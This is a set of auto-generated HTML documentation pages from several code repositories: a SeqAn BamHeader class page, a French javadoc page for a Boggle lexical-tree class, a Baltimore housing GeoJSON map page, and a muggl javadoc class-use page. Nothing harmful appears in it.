.highlight .err { border: 1px solid #FF0000 } /* Error */
.highlight .k { color: #008000; font-weight: bold } /* Keyword */
.highlight .o { color: #666666 } /* Operator */
.highlight .cm { color: #408080; font-style: italic } /* Comment.Multiline */
.highlight .cp { color: #BC7A00 } /* Comment.Preproc */
.highlight .c1 { color: #408080; font-style: italic } /* Comment.Single */
.highlight .cs { color: #408080; font-style: italic } /* Comment.Special */
.highlight .gd { color: #A00000 } /* Generic.Deleted */
.highlight .ge { font-style: italic } /* Generic.Emph */
.highlight .gr { color: #FF0000 } /* Generic.Error */
.highlight .gh { color: #000080; font-weight: bold } /* Generic.Heading */
.highlight .gi { color: #00A000 } /* Generic.Inserted */
.highlight .go { color: #888888 } /* Generic.Output */
.highlight .gp { color: #000080; font-weight: bold } /* Generic.Prompt */
.highlight .gs { font-weight: bold } /* Generic.Strong */
.highlight .gu { color: #800080; font-weight: bold } /* Generic.Subheading */
.highlight .gt { color: #0044DD } /* Generic.Traceback */
.highlight .kc { color: #008000; font-weight: bold } /* Keyword.Constant */
.highlight .kd { color: #008000; font-weight: bold } /* Keyword.Declaration */
.highlight .kn { color: #008000; font-weight: bold } /* Keyword.Namespace */
.highlight .kp { color: #008000 } /* Keyword.Pseudo */
.highlight .kr { color: #008000; font-weight: bold } /* Keyword.Reserved */
.highlight .kt { color: #B00040 } /* Keyword.Type */
.highlight .m { color: #666666 } /* Literal.Number */
.highlight .s { color: #BA2121 } /* Literal.String */
.highlight .na { color: #7D9029 } /* Name.Attribute */
.highlight .nb { color: #008000 } /* Name.Builtin */
.highlight .nc { color: #0000FF; font-weight: bold } /* Name.Class */
.highlight .no { color: #880000 } /* Name.Constant */
.highlight .nd { color: #AA22FF } /* Name.Decorator */
.highlight .ni { color: #999999; font-weight: bold } /* Name.Entity */
.highlight .ne { color: #D2413A; font-weight: bold } /* Name.Exception */
.highlight .nf { color: #0000FF } /* Name.Function */
.highlight .nl { color: #A0A000 } /* Name.Label */
.highlight .nn { color: #0000FF; font-weight: bold } /* Name.Namespace */
.highlight .nt { color: #008000; font-weight: bold } /* Name.Tag */
.highlight .nv { color: #19177C } /* Name.Variable */
.highlight .ow { color: #AA22FF; font-weight: bold } /* Operator.Word */
.highlight .w { color: #bbbbbb } /* Text.Whitespace */
.highlight .mf { color: #666666 } /* Literal.Number.Float */
.highlight .mh { color: #666666 } /* Literal.Number.Hex */
.highlight .mi { color: #666666 } /* Literal.Number.Integer */
.highlight .mo { color: #666666 } /* Literal.Number.Oct */
.highlight .sb { color: #BA2121 } /* Literal.String.Backtick */
.highlight .sc { color: #BA2121 } /* Literal.String.Char */
.highlight .sd { color: #BA2121; font-style: italic } /* Literal.String.Doc */
.highlight .s2 { color: #BA2121 } /* Literal.String.Double */
.highlight .se { color: #BB6622; font-weight: bold } /* Literal.String.Escape */
.highlight .sh { color: #BA2121 } /* Literal.String.Heredoc */
.highlight .si { color: #BB6688; font-weight: bold } /* Literal.String.Interpol */
.highlight .sx { color: #008000 } /* Literal.String.Other */
.highlight .sr { color: #BB6688 } /* Literal.String.Regex */
.highlight .s1 { color: #BA2121 } /* Literal.String.Single */
.highlight .ss { color: #19177C } /* Literal.String.Symbol */
.highlight .bp { color: #008000 } /* Name.Builtin.Pseudo */
.highlight .vc { color: #19177C } /* Name.Variable.Class */
.highlight .vg { color: #19177C } /* Name.Variable.Global */
.highlight .vi { color: #19177C } /* Name.Variable.Instance */
.highlight .il { color: #666666 } /* Literal.Number.Integer.Long */
</style>
<style>
.link.error
{
color: red;
}
</style>
<script type="text/javascript" charset="utf-8" src="lib/jquery-bbq/jquery.ba-bbq.min.js"></script>
<script type="text/javascript" charset="utf-8" src="js/jquery.smooth-scroll.js"></script>
<script type="text/javascript" charset="utf-8" src="js/lang_entities.js"></script>
<script type="text/javascript" charset="utf-8" src="js/app.js"></script>
<script type="text/javascript" charset="utf-8" src="js/autocomplete.js"></script>
<script type="text/javascript" charset="utf-8" src="js/rubydoc_custom.js"></script>
<script type="text/javascript" charset="utf-8" src="js/common.js"></script>
</head>
<body>
<a id="top" name="top"></a>
<div id="content">
<h1 data-lang-entity="class" data-pimped="true"><a href="page_LanguageEntities.html#class">Class</a>
<span>BamHeader<div><div>Represent the information of the BAM header.</div></div></span>
</h1>
<table class="overview">
<tr>
<th>Implements</dt>
<td>
<a href="concept_FormattedFileHeaderConcept.html" data-lang-entity="concept">FormattedFileHeaderConcept</a>
</td>
</tr>
<tr>
<th>All Impl'd</dt>
<td>
<a href="concept_AssignableConcept.html" data-lang-entity="concept">AssignableConcept</a>,
<a href="concept_CopyConstructibleConcept.html" data-lang-entity="concept">CopyConstructibleConcept</a>,
<a href="concept_DefaultConstructibleConcept.html" data-lang-entity="concept">DefaultConstructibleConcept</a>,
<a href="concept_FormattedFileHeaderConcept.html" data-lang-entity="concept">FormattedFileHeaderConcept</a>
</td>
</tr>
<tr>
<th>Defined in</th>
<td>
<seqan/bam_io.h>
</td>
</tr>
<tr>
<th>Signature</th>
<td>
<code>typedef String<BamHeaderRecord> BamHeader;
</code>
</td>
</tr>
</table>
<!-- Template Parameters -->
<!--
=============================================================================
Member and Interface Overview
=============================================================================
-->
<!-- Member Functions Overview -->
<div data-lang-entity-container="member_function">
<h2 data-lang-entity="member_function">Member Function Overview</h2>
<h3 data-toc="hidden">Member Functions Inherited From <a href="concept_AssignableConcept.html" data-lang-entity="concept">AssignableConcept</a></h3>
<ul class="summary compact">
<li class="public"><span class="summary_signature"><code><a href="concept_AssignableConcept.html#AssignableConcept::operator=" data-lang-entity="member_function">operator=</a></code></span></li>
</ul>
</div>
<!-- Interface Functions Overview -->
<div data-lang-entity-container="interface_function">
<h2 data-lang-entity="interface_function">Interface Function Overview</h2>
<h3 data-toc="hidden">Interface Functions Inherited From <a href="concept_AssignableConcept.html" data-lang-entity="concept">AssignableConcept</a></h3>
<ul class="summary compact">
<li class="public"><span class="summary_signature"><code><a href="concept_AssignableConcept.html#AssignableConcept#assign" data-lang-entity="interface_function">assign</a></code></span></li>
<li class="public"><span class="summary_signature"><code><a href="concept_AssignableConcept.html#AssignableConcept#set" data-lang-entity="interface_function">set</a></code></span></li>
<li class="public"><span class="summary_signature"><code><a href="concept_AssignableConcept.html#AssignableConcept#move" data-lang-entity="interface_function">move</a></code></span></li>
</ul>
</div>
<!-- Member Typedefs Overview -->
<!-- Interface Metafunctions Overview -->
<!-- Member Variable Overview -->
<!--
=============================================================================
Detailed Description
=============================================================================
-->
<!-- @see -->
<h2 class="clause_header">See Also</h2>
<ul class="summary compact">
<li><a href="specialization_BamFileIn.html" data-lang-entity="specialization">BamFileIn</a></li>
<li><a href="specialization_BamFileOut.html" data-lang-entity="specialization">BamFileOut</a></li>
</ul>
<!--
=============================================================================
Member and Interface Details
=============================================================================
-->
<!-- Member Functions Details -->
<!-- Interface Functions Details -->
<!-- Member Typedefs Details -->
<!-- Interface Metafunctions Details -->
<!-- Member Variable Details -->
<!--
=============================================================================
Footer / Debug
=============================================================================
-->
<div class="modal fade" id="doxSources" tabindex="-1" role="dialog" aria-labelledby="doxSourcesLabel" aria-hidden="true">
<div class="modal-dialog">
<div class="modal-content">
<div class="modal-header">
<button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button>
<h4 class="modal-title" id="doxSourcesLabel">Dox Sources</h4>
</div>
<div class="modal-body">
<pre>/*!
* @class BamHeader
*
* @implements FormattedFileHeaderConcept
*
* @headerfile <seqan/bam_io.h>
*
* @brief Represent the information of the BAM header.
*
* @signature typedef String<BamHeaderRecord> BamHeader;
*
* @see BamFileIn
* @see BamFileOut
*/</pre>
</div>
<div class="modal-footer">
<button type="button" class="btn btn-primary" data-dismiss="modal">Close</button>
</div>
</div>
</div>
</div>
</div>
</body>
</html> |
doc/boggle/mots/ArbreLexical.html | ecattez/da2i-boggle | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- NewPage -->
<html lang="fr">
<head>
<!-- Generated by javadoc (version 1.7.0_91) on Wed Dec 16 09:29:35 CET 2015 -->
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>ArbreLexical</title>
<meta name="date" content="2015-12-16">
<link rel="stylesheet" type="text/css" href="../../stylesheet.css" title="Style">
</head>
<body>
<script type="text/javascript"><!--
if (location.href.indexOf('is-external=true') == -1) {
parent.document.title="ArbreLexical";
}
//-->
</script>
<noscript>
<div>JavaScript is disabled on your browser.</div>
</noscript>
<!-- ========= START OF TOP NAVBAR ======= -->
<div class="topNav"><a name="navbar_top">
<!-- -->
</a><a href="#skip-navbar_top" title="Skip navigation links"></a><a name="navbar_top_firstrow">
<!-- -->
</a>
<ul class="navList" title="Navigation">
<li><a href="../../overview-summary.html">Overview</a></li>
<li><a href="package-summary.html">Package</a></li>
<li class="navBarCell1Rev">Class</li>
<li><a href="class-use/ArbreLexical.html">Use</a></li>
<li><a href="package-tree.html">Tree</a></li>
<li><a href="../../deprecated-list.html">Deprecated</a></li>
<li><a href="../../index-files/index-1.html">Index</a></li>
<li><a href="../../help-doc.html">Help</a></li>
</ul>
</div>
<div class="subNav">
<ul class="navList">
<li>Prev Class</li>
<li><a href="../../boggle/mots/Coordonnees.html" title="interface in boggle.mots"><span class="strong">Next Class</span></a></li>
</ul>
<ul class="navList">
<li><a href="../../index.html?boggle/mots/ArbreLexical.html" target="_top">Frames</a></li>
<li><a href="ArbreLexical.html" target="_top">No Frames</a></li>
</ul>
<ul class="navList" id="allclasses_navbar_top">
<li><a href="../../allclasses-noframe.html">All Classes</a></li>
</ul>
<div>
<script type="text/javascript"><!--
allClassesLink = document.getElementById("allclasses_navbar_top");
if(window==top) {
allClassesLink.style.display = "block";
}
else {
allClassesLink.style.display = "none";
}
//-->
</script>
</div>
<div>
<ul class="subNavList">
<li>Summary: </li>
<li>Nested | </li>
<li><a href="#field_summary">Field</a> | </li>
<li><a href="#constructor_summary">Constr</a> | </li>
<li><a href="#method_summary">Method</a></li>
</ul>
<ul class="subNavList">
<li>Detail: </li>
<li><a href="#field_detail">Field</a> | </li>
<li><a href="#constructor_detail">Constr</a> | </li>
<li><a href="#method_detail">Method</a></li>
</ul>
</div>
<a name="skip-navbar_top">
<!-- -->
</a></div>
<!-- ========= END OF TOP NAVBAR ========= -->
<!-- ======== START OF CLASS DATA ======== -->
<div class="header">
<div class="subTitle">boggle.mots</div>
<h2 title="Class ArbreLexical" class="title">Class ArbreLexical</h2>
</div>
<div class="contentContainer">
<ul class="inheritance">
<li>java.lang.Object</li>
<li>
<ul class="inheritance">
<li>boggle.mots.ArbreLexical</li>
</ul>
</li>
</ul>
<div class="description">
<ul class="blockList">
<li class="blockList">
<hr>
<br>
<pre>public class <span class="strong">ArbreLexical</span>
extends java.lang.Object</pre>
<div class="block">La classe ArbreLexical permet de stocker de façon compacte et d'accéder rapidement à un ensemble de mots.</div>
</li>
</ul>
</div>
<div class="summary">
<ul class="blockList">
<li class="blockList">
<!-- =========== FIELD SUMMARY =========== -->
<ul class="blockList">
<li class="blockList"><a name="field_summary">
<!-- -->
</a>
<h3>Field Summary</h3>
<table class="overviewSummary" border="0" cellpadding="3" cellspacing="0" summary="Field Summary table, listing fields, and an explanation">
<caption><span>Fields</span><span class="tabEnd"> </span></caption>
<tr>
<th class="colFirst" scope="col">Modifier and Type</th>
<th class="colLast" scope="col">Field and Description</th>
</tr>
<tr class="altColor">
<td class="colFirst"><code>static int</code></td>
<td class="colLast"><code><strong><a href="../../boggle/mots/ArbreLexical.html#TAILLE_ALPHABET">TAILLE_ALPHABET</a></strong></code> </td>
</tr>
</table>
</li>
</ul>
<!-- ======== CONSTRUCTOR SUMMARY ======== -->
<ul class="blockList">
<li class="blockList"><a name="constructor_summary">
<!-- -->
</a>
<h3>Constructor Summary</h3>
<table class="overviewSummary" border="0" cellpadding="3" cellspacing="0" summary="Constructor Summary table, listing constructors, and an explanation">
<caption><span>Constructors</span><span class="tabEnd"> </span></caption>
<tr>
<th class="colOne" scope="col">Constructor and Description</th>
</tr>
<tr class="altColor">
<td class="colOne"><code><strong><a href="../../boggle/mots/ArbreLexical.html#ArbreLexical()">ArbreLexical</a></strong>()</code>
<div class="block">Crée un arbre vide (sans aucun mot)</div>
</td>
</tr>
</table>
</li>
</ul>
<!-- ========== METHOD SUMMARY =========== -->
<ul class="blockList">
<li class="blockList"><a name="method_summary">
<!-- -->
</a>
<h3>Method Summary</h3>
<table class="overviewSummary" border="0" cellpadding="3" cellspacing="0" summary="Method Summary table, listing methods, and an explanation">
<caption><span>Methods</span><span class="tabEnd"> </span></caption>
<tr>
<th class="colFirst" scope="col">Modifier and Type</th>
<th class="colLast" scope="col">Method and Description</th>
</tr>
<tr class="altColor">
<td class="colFirst"><code>boolean</code></td>
<td class="colLast"><code><strong><a href="../../boggle/mots/ArbreLexical.html#ajouter(java.lang.String)">ajouter</a></strong>(java.lang.String word)</code>
<div class="block">Place le mot en paramètre dans l'arbre</div>
</td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code>boolean</code></td>
<td class="colLast"><code><strong><a href="../../boggle/mots/ArbreLexical.html#contient(java.lang.String)">contient</a></strong>(java.lang.String word)</code>
<div class="block">Teste si l'arbre lexical contient le mot spécifié.</div>
</td>
</tr>
<tr class="altColor">
<td class="colFirst"><code>static <a href="../../boggle/mots/ArbreLexical.html" title="class in boggle.mots">ArbreLexical</a></code></td>
<td class="colLast"><code><strong><a href="../../boggle/mots/ArbreLexical.html#creerArbre(java.nio.file.Path)">creerArbre</a></strong>(java.nio.file.Path fichier)</code>
<div class="block">Crée un arbre lexical qui contient tous les mots du fichier spécifié.</div>
</td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code>static <a href="../../boggle/mots/ArbreLexical.html" title="class in boggle.mots">ArbreLexical</a></code></td>
<td class="colLast"><code><strong><a href="../../boggle/mots/ArbreLexical.html#creerArbre(java.lang.String)">creerArbre</a></strong>(java.lang.String fichier)</code>
<div class="block">Crée un arbre lexical qui contient tous les mots du fichier spécifié.</div>
</td>
</tr>
<tr class="altColor">
<td class="colFirst"><code>boolean</code></td>
<td class="colLast"><code><strong><a href="../../boggle/mots/ArbreLexical.html#estMot()">estMot</a></strong>()</code>
<div class="block">Indique si le noeud courante est situé à l'extrémité d'un mot valide</div>
</td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code>boolean</code></td>
<td class="colLast"><code><strong><a href="../../boggle/mots/ArbreLexical.html#motsCommencantPar(java.lang.String,%20java.util.List)">motsCommencantPar</a></strong>(java.lang.String prefixe,
java.util.List<java.lang.String> resultat)</code>
<div class="block">Ajoute à la liste resultat tous les mots de l'arbre commençant par le préfixe spécifié.</div>
</td>
</tr>
</table>
<ul class="blockList">
<li class="blockList"><a name="methods_inherited_from_class_java.lang.Object">
<!-- -->
</a>
<h3>Methods inherited from class java.lang.Object</h3>
<code>equals, getClass, hashCode, notify, notifyAll, toString, wait, wait, wait</code></li>
</ul>
</li>
</ul>
</li>
</ul>
</div>
<div class="details">
<ul class="blockList">
<li class="blockList">
<!-- ============ FIELD DETAIL =========== -->
<ul class="blockList">
<li class="blockList"><a name="field_detail">
<!-- -->
</a>
<h3>Field Detail</h3>
<a name="TAILLE_ALPHABET">
<!-- -->
</a>
<ul class="blockListLast">
<li class="blockList">
<h4>TAILLE_ALPHABET</h4>
<pre>public static final int TAILLE_ALPHABET</pre>
<dl><dt><span class="strong">See Also:</span></dt><dd><a href="../../constant-values.html#boggle.mots.ArbreLexical.TAILLE_ALPHABET">Constant Field Values</a></dd></dl>
</li>
</ul>
</li>
</ul>
<!-- ========= CONSTRUCTOR DETAIL ======== -->
<ul class="blockList">
<li class="blockList"><a name="constructor_detail">
<!-- -->
</a>
<h3>Constructor Detail</h3>
<a name="ArbreLexical()">
<!-- -->
</a>
<ul class="blockListLast">
<li class="blockList">
<h4>ArbreLexical</h4>
<pre>public ArbreLexical()</pre>
<div class="block">Crée un arbre vide (sans aucun mot)</div>
</li>
</ul>
</li>
</ul>
<!-- ============ METHOD DETAIL ========== -->
<ul class="blockList">
<li class="blockList"><a name="method_detail">
<!-- -->
</a>
<h3>Method Detail</h3>
<a name="estMot()">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>estMot</h4>
<pre>public boolean estMot()</pre>
<div class="block">Indique si le noeud courante est situé à l'extrémité d'un mot valide</div>
<dl><dt><span class="strong">Returns:</span></dt><dd><code>true</code> si le noeud avec ou sans ses parents forment un mot, <code>false</code> sinon</dd></dl>
</li>
</ul>
<a name="ajouter(java.lang.String)">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>ajouter</h4>
<pre>public boolean ajouter(java.lang.String word)</pre>
<div class="block">Place le mot en paramètre dans l'arbre</div>
<dl><dt><span class="strong">Parameters:</span></dt><dd><code>word</code> - le mot à ajouter dans l'arbre</dd>
<dt><span class="strong">Returns:</span></dt><dd><code>true</code> si le mot a été ajouté, <code>false</code> sinon</dd></dl>
</li>
</ul>
<a name="contient(java.lang.String)">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>contient</h4>
<pre>public boolean contient(java.lang.String word)</pre>
<div class="block">Teste si l'arbre lexical contient le mot spécifié.</div>
<dl><dt><span class="strong">Parameters:</span></dt><dd><code>word</code> - le mot qui peut se trouver dans l'arbre</dd>
<dt><span class="strong">Returns:</span></dt><dd><code>true</code> si <code>word</code> est un mot (String) contenu dans l'arbre, <code>false</code> sinon.</dd></dl>
</li>
</ul>
<a name="motsCommencantPar(java.lang.String, java.util.List)">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>motsCommencantPar</h4>
<pre>public boolean motsCommencantPar(java.lang.String prefixe,
java.util.List<java.lang.String> resultat)</pre>
<div class="block">Ajoute à la liste resultat tous les mots de l'arbre commençant par le préfixe spécifié.</div>
<dl><dt><span class="strong">Parameters:</span></dt><dd><code>prefixe</code> - le préfixe du mot</dd><dd><code>resultat</code> - la liste des mots qui commence par le préfixe</dd>
<dt><span class="strong">Returns:</span></dt><dd><code>true</code> si resultat a été modifié, <code>false</code> sinon.</dd></dl>
</li>
</ul>
<a name="creerArbre(java.lang.String)">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>creerArbre</h4>
<pre>public static <a href="../../boggle/mots/ArbreLexical.html" title="class in boggle.mots">ArbreLexical</a> creerArbre(java.lang.String fichier)</pre>
<div class="block">Crée un arbre lexical qui contient tous les mots du fichier spécifié.</div>
<dl><dt><span class="strong">Parameters:</span></dt><dd><code>fichier</code> - le chemin du fichier à charger</dd>
<dt><span class="strong">Returns:</span></dt><dd>une nouvelle instance d'ArbreLexical chargée avec des mots du dictionnaire</dd></dl>
</li>
</ul>
<a name="creerArbre(java.nio.file.Path)">
<!-- -->
</a>
<ul class="blockListLast">
<li class="blockList">
<h4>creerArbre</h4>
<pre>public static <a href="../../boggle/mots/ArbreLexical.html" title="class in boggle.mots">ArbreLexical</a> creerArbre(java.nio.file.Path fichier)</pre>
<div class="block">Crée un arbre lexical qui contient tous les mots du fichier spécifié.</div>
<dl><dt><span class="strong">Parameters:</span></dt><dd><code>fichier</code> - le chemin du fichier à charger</dd>
<dt><span class="strong">Returns:</span></dt><dd>une nouvelle instance d'ArbreLexical chargée avec des mots du dictionnaire</dd></dl>
</li>
</ul>
</li>
</ul>
</li>
</ul>
</div>
</div>
<!-- ========= END OF CLASS DATA ========= -->
<!-- ======= START OF BOTTOM NAVBAR ====== -->
<div class="bottomNav"><a name="navbar_bottom">
<!-- -->
</a><a href="#skip-navbar_bottom" title="Skip navigation links"></a><a name="navbar_bottom_firstrow">
<!-- -->
</a>
<ul class="navList" title="Navigation">
<li><a href="../../overview-summary.html">Overview</a></li>
<li><a href="package-summary.html">Package</a></li>
<li class="navBarCell1Rev">Class</li>
<li><a href="class-use/ArbreLexical.html">Use</a></li>
<li><a href="package-tree.html">Tree</a></li>
<li><a href="../../deprecated-list.html">Deprecated</a></li>
<li><a href="../../index-files/index-1.html">Index</a></li>
<li><a href="../../help-doc.html">Help</a></li>
</ul>
</div>
<div class="subNav">
<ul class="navList">
<li>Prev Class</li>
<li><a href="../../boggle/mots/Coordonnees.html" title="interface in boggle.mots"><span class="strong">Next Class</span></a></li>
</ul>
<ul class="navList">
<li><a href="../../index.html?boggle/mots/ArbreLexical.html" target="_top">Frames</a></li>
<li><a href="ArbreLexical.html" target="_top">No Frames</a></li>
</ul>
<ul class="navList" id="allclasses_navbar_bottom">
<li><a href="../../allclasses-noframe.html">All Classes</a></li>
</ul>
<div>
<script type="text/javascript"><!--
allClassesLink = document.getElementById("allclasses_navbar_bottom");
if(window==top) {
allClassesLink.style.display = "block";
}
else {
allClassesLink.style.display = "none";
}
//-->
</script>
</div>
<div>
<ul class="subNavList">
<li>Summary: </li>
<li>Nested | </li>
<li><a href="#field_summary">Field</a> | </li>
<li><a href="#constructor_summary">Constr</a> | </li>
<li><a href="#method_summary">Method</a></li>
</ul>
<ul class="subNavList">
<li>Detail: </li>
<li><a href="#field_detail">Field</a> | </li>
<li><a href="#constructor_detail">Constr</a> | </li>
<li><a href="#method_detail">Method</a></li>
</ul>
</div>
<a name="skip-navbar_bottom">
<!-- -->
</a></div>
<!-- ======== END OF BOTTOM NAVBAR ======= -->
</body>
</html>
|
msa_data/12580/12580_hous.html | co-ncrn/co-ncrn.github.io |
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="chrome=1">
<title>Baltimore-Columbia-Towson, MD Housing Scenario Maps</title>
<link rel="stylesheet" href="../../stylesheets/styles.css">
<link rel="stylesheet" href="../../stylesheets/github-light.css">
<meta name="viewport" content="width=device-width">
<!--[if lt IE 9]>
<script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
</head>
<body>
<div class="wrapper">
<header>
<h1>Baltimore-Columbia-Towson, MD Housing Scenario</h1><p><a href="../../index.html">Home</a></p><p><a href="../../msa_data/12580/12580_hous_region.json" download="12580_hous_region">Download region GeoJSON</a></p><p><a href="../../msa_data/12580/12580_hous_tracts.json" download="12580_hous_tracts">Download tract GeoJSON</a><p>
</header>
<section>
<h1>Regions</h1>
<p>Click regions to display data</p>
<script src="https://embed.github.com/view/geojson/beckymasond/beckymasond.github.io/master/msa_data/12580/12580_hous_region.json?height=600&width=600"></script>
<p></p>
<h1>Tracts</h1>
<p>Click tracts to display data</p>
<script src="https://embed.github.com/view/geojson/beckymasond/beckymasond.github.io/master/msa_data/12580/12580_hous_tracts.json?height=600&width=600"></script>
</section>
<footer>
<p><small>Hosted on GitHub Pages — Theme by <a href="https://github.com/orderedlist">orderedlist</a></small></p>
</footer>
</div>
<script src="javascripts/scale.fix.js"></script>
</body>
</html>
|
muggl-swt/docs/javadoc/de/wwu/muggl/instructions/bytecode/class-use/Instanceof.html | wwu-pi/muggl | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--NewPage-->
<HTML>
<HEAD>
<!-- Generated by javadoc (build 1.6.0_07) on Wed Dec 08 12:09:07 CET 2010 -->
<TITLE>
Uses of Class de.wwu.muggl.instructions.bytecode.Instanceof
</TITLE>
<META NAME="date" CONTENT="2010-12-08">
<LINK REL ="stylesheet" TYPE="text/css" HREF="../../../../../../stylesheet.css" TITLE="Style">
<SCRIPT type="text/javascript">
function windowTitle()
{
if (location.href.indexOf('is-external=true') == -1) {
parent.document.title="Uses of Class de.wwu.muggl.instructions.bytecode.Instanceof";
}
}
</SCRIPT>
<NOSCRIPT>
</NOSCRIPT>
</HEAD>
<BODY BGCOLOR="white" onload="windowTitle();">
<HR>
<!-- ========= START OF TOP NAVBAR ======= -->
<A NAME="navbar_top"><!-- --></A>
<A HREF="#skip-navbar_top" title="Skip navigation links"></A>
<TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0" SUMMARY="">
<TR>
<TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1">
<A NAME="navbar_top_firstrow"><!-- --></A>
<TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3" SUMMARY="">
<TR ALIGN="center" VALIGN="top">
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../overview-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../package-summary.html"><FONT CLASS="NavBarFont1"><B>Package</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../de/wwu/muggl/instructions/bytecode/Instanceof.html" title="class in de.wwu.muggl.instructions.bytecode"><FONT CLASS="NavBarFont1"><B>Class</B></FONT></A> </TD>
<TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> <FONT CLASS="NavBarFont1Rev"><B>Use</B></FONT> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../package-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../index-files/index-1.html"><FONT CLASS="NavBarFont1"><B>Index</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A> </TD>
</TR>
</TABLE>
</TD>
<TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM>
</EM>
</TD>
</TR>
<TR>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
PREV
NEXT</FONT></TD>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
<A HREF="../../../../../../index.html?de/wwu/muggl/instructions/bytecode/\class-useInstanceof.html" target="_top"><B>FRAMES</B></A>
<A HREF="Instanceof.html" target="_top"><B>NO FRAMES</B></A>
<SCRIPT type="text/javascript">
<!--
if(window==top) {
document.writeln('<A HREF="../../../../../../allclasses-noframe.html"><B>All Classes</B></A>');
}
//-->
</SCRIPT>
<NOSCRIPT>
<A HREF="../../../../../../allclasses-noframe.html"><B>All Classes</B></A>
</NOSCRIPT>
</FONT></TD>
</TR>
</TABLE>
<A NAME="skip-navbar_top"></A>
<!-- ========= END OF TOP NAVBAR ========= -->
<HR>
<CENTER>
<H2>
<B>Uses of Class<br>de.wwu.muggl.instructions.bytecode.Instanceof</B></H2>
</CENTER>
No usage of de.wwu.muggl.instructions.bytecode.Instanceof
<P>
<HR>
<!-- ======= START OF BOTTOM NAVBAR ====== -->
<A NAME="navbar_bottom"><!-- --></A>
<A HREF="#skip-navbar_bottom" title="Skip navigation links"></A>
<TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0" SUMMARY="">
<TR>
<TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1">
<A NAME="navbar_bottom_firstrow"><!-- --></A>
<TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3" SUMMARY="">
<TR ALIGN="center" VALIGN="top">
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../overview-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../package-summary.html"><FONT CLASS="NavBarFont1"><B>Package</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../de/wwu/muggl/instructions/bytecode/Instanceof.html" title="class in de.wwu.muggl.instructions.bytecode"><FONT CLASS="NavBarFont1"><B>Class</B></FONT></A> </TD>
<TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> <FONT CLASS="NavBarFont1Rev"><B>Use</B></FONT> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../package-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../index-files/index-1.html"><FONT CLASS="NavBarFont1"><B>Index</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A> </TD>
</TR>
</TABLE>
</TD>
<TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM>
</EM>
</TD>
</TR>
<TR>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
PREV
NEXT</FONT></TD>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
<A HREF="../../../../../../index.html?de/wwu/muggl/instructions/bytecode/\class-useInstanceof.html" target="_top"><B>FRAMES</B></A>
<A HREF="Instanceof.html" target="_top"><B>NO FRAMES</B></A>
<SCRIPT type="text/javascript">
<!--
if(window==top) {
document.writeln('<A HREF="../../../../../../allclasses-noframe.html"><B>All Classes</B></A>');
}
//-->
</SCRIPT>
<NOSCRIPT>
<A HREF="../../../../../../allclasses-noframe.html"><B>All Classes</B></A>
</NOSCRIPT>
</FONT></TD>
</TR>
</TABLE>
<A NAME="skip-navbar_bottom"></A>
